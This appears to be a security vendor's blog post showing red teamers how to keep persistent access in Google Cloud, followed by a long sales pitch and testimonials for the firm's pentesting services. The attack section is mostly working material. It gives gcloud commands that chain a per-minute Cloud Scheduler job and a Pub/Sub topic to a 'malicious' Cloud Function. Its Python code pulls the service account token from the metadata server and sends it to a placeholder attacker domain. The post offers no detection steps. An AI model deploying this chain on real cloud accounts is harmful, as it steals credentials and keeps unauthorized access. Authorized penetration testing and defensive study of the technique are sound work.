How to Pentest or Redteam GCP Using Cron Jobs and Persistence Techniques

Introduction

Nowadays, the vast majority of companies are running in the cloud. AWS, GCP (Google Cloud infrastructure / Google Cloud Platform), and Azure are some of the most popular cloud providers out there, so as a security engineer, it's important to be well-equipped to handle these types of engagements. Performing a security engagement on cloud providers can be relatively hard due to the lack of information around redteaming and cloud penetration testing networks.  Google Cloud Provider (GCP) is one cloud provider you might run into during an engagement, so it is important to tackle GCP penetration testing. For a complete guide on cloud security, download the eBook written from a hacker's perspective. This guide will help you understand GCP vulnerability assessment and penetration testing.

If you're performing a red team exercise, setting up persistence penetration testing in your target environment is key. No one wants to lose days of work due to losing access to your target, which is why you need to know a few persistence techniques. These techniques are also great for the blue team and threat hunters, so they know what to look for when searching for signs of compromise.

Cron Job

If you’re familiar with Linux cron jobs, Google Cloud Scheduler is the same thing. It's common for linux malware to use cron jobs for persistence, and the same technique can be used in the Google cloud penetration testing.

These cron jobs can be used as triggers for many things, but I'll be using it to send a Pub/Sub message. We can then set up a cloud function that will be triggered when it receives a Pub/Sub message. The cloud function can do anything you want, but I'll be using it to send  service account credentials to an attacker's machine. 

This attack only involves three steps, as shown below:

  • Create a pub/sub topic
  • Create a cron job task
  • Create the malicious cloud function

 The first step is to create a Pub/Sub topic, as shown below. This topic will be used to trigger the cloud function every time a cron job fires. 

  • gcloud pubsub topics create test

Next create a cron job. In this example, I'll create a cron job that executes every minute. This cron job will post a message to a Pub/Sub topic ultimately triggering the malicious cloud function.

  • gcloud scheduler jobs create pubsub myjob --schedule "* * * * *" --topic mytopic  --message-body "Hello"

Finally, create the malicious cloud function. This function should be used to do some malicious action. In this example, it will send the attacker an authentication token.

  • gcloud functions deploy <CLOUD-FUNCTION-NAME>--entry-point <PYTHON-FUNCTION-NAME>--runtime python37 --trigger-topic=<TOPIC-NAME>

As you can see in the below image, the cloud function’s source code is fairly simple. First, we hit the metadata service to grab the attached service account’s authentication token. Then we send this to the attacker via a GET request.

import requests

import json

def evil_pubsub(event, context):

    """Triggered from a message on a Cloud Pub/Sub topic.

    Args:

         event (dict): Event payload.

         context (google.cloud.functions.Context): Metadata for the event.

    """

    r = requests.get(url = "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token",headers={"Metadata-Flavor":"Google"})

    PARAMS = {"data":r.text}

    requests.get(url="http://<ATTCKER-DOMAIN-HERE>/",params = PARAMS)

Once the cron job runs, it will send a message to the Pub/Sub topic. The malicious cloud function will be  listening to this topic and when triggered, it  grabs the attached service account creds and sends them to the attacker's machine.

Cron jobs have been used as a persistence technique for years, and we can use the same techniques for persistence in the cloud.

Red Sentry Cloud Scanner

If you want to check the security posture of your company's cloud environment, Red Sentry has a very impressive cloud scanner that identify security vulnerabilities, checks for misconfigurations, privilege escalation, and much more in AWS, GCP, and Azure environments. After the scan, you can download a full report on the findings and view our recommendations on how to fix the vulnerabilities found. In addition to our cloud scanner, we also offer traditional penetration testing of various cloud environments. 

If you want us to look at your cloud environment so you can better secure yourself, schedule a manual pentest or sign up our cloud vulnerability scanner today!

Conclusion

The cloud is still relatively new, but it's being adopted by almost everyone. As a security professional, it's important to understand the types of attacks that can be performed on these environments. Being able to set up persistence in your target’s environment, or if you're on the defensive side, being able to detect persistent techniques, is vital. A cron job is one of many persistence techniques that can be used on GCP pentesting. It's relatively easy to set up and can easily go unnoticed by defenders if they aren't aware of this technique. For a complete guide on cloud security, download the eBook written from a hacker's perspective.

Alex Thomas
CTO, Founder
Alex started his career as an ethical hacker, eventually working as a penetration tester, hacking into fortune 500 companies all day long. Alex invented the Red Sentry software platform, a tool that could help people take action before they were victim to a hack. Pairing this software with a team of seasoned pentesters, Red Sentry has created a hybrid approach that allows businesses to get a thorough manual pentest quickly, while also utilizing the Red Sentry software, to ensure year around security.

What Results You Can Expect

Below are just some of the reasons why you should choose Red Sentry.

No Lead Times

We make the process smooth. We have no lead times (for those ASAP pentests).

Dedicated Project Manager

Your PM will communicate with your team throughout the pentest process.

No Hidden Fees

There are no hidden fees or overage fees. The price you see, is what you get.

Retest

We offer a retest once you patch up any vulnerabilities.

Affordable Pentests

We make pentesting affordable by cutting out any fluff hourage.

Actionable Reporting

We report all criticals and highs to your team immediately during testing.

You're in Good Hands

Save time, avoid false positives, truly operationalize security, and manage costs.

Schedule a Pentest
Stars Review

Rated 4.8 on G2 & Capterra

"The Healthcare sector has been heavily affected by cyber attacks this past year. As we have so much sensitive data in our business, security is one of my main concerns. Since we’ve been using Red Sentry, I feel more confident because my team knows which patches need to be applied first and how to test them afterwards.”
Dana White
CTO, American Cosmetic Surgery Network
"We hold most of our data inside our Cloud infrastructure, which not many cybersecurity companies are focused on. Being able to have a thorough look at our Cloud security allows us to report our status to our clients and assure them we are taking a proactive approach to cybersecurity.”
Gabe Killian
VP Software Security, Procella Health
"Great enterprise tools for risk assessments. We were up and running on the software in just one day. Very easy team to work with and extremely affordable for the amount of visibility and features you get.”
David Lewandowski
CTO, United Networks of America
"We are pleased to have a strategic partnership with Red Sentry that offers our joint customers a leading integrated security solution that reduces risk and helps to keep threats out of the environment. Together, we are delivering highly accurate network assessments and intelligent automation of workflow processes and policies for a diverse customer base."
David Cartwright
Head of Commercial Cyber Security for Osi Vision

See how we compare

We strive to bring the best pentest solution, for the cheapest price. And did we mention that we are fast?

Other Pentest Solutions

Red Sentry

Time to Launch: Weeks to Months
Time to Launch: < 7 days
Price: High (excessive fluff hours charged)
Price: Most Affordable (Ask about Price Matching)
Support: Medium
Support: High with dedicated PMs and Team Leads
False Positive Rate: Medium
False Positive Rate: Low
Customer Satisfaction: 
Medium
Customer Satisfaction: High

Discover your vulnerabilities

Schedule a Pentest
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.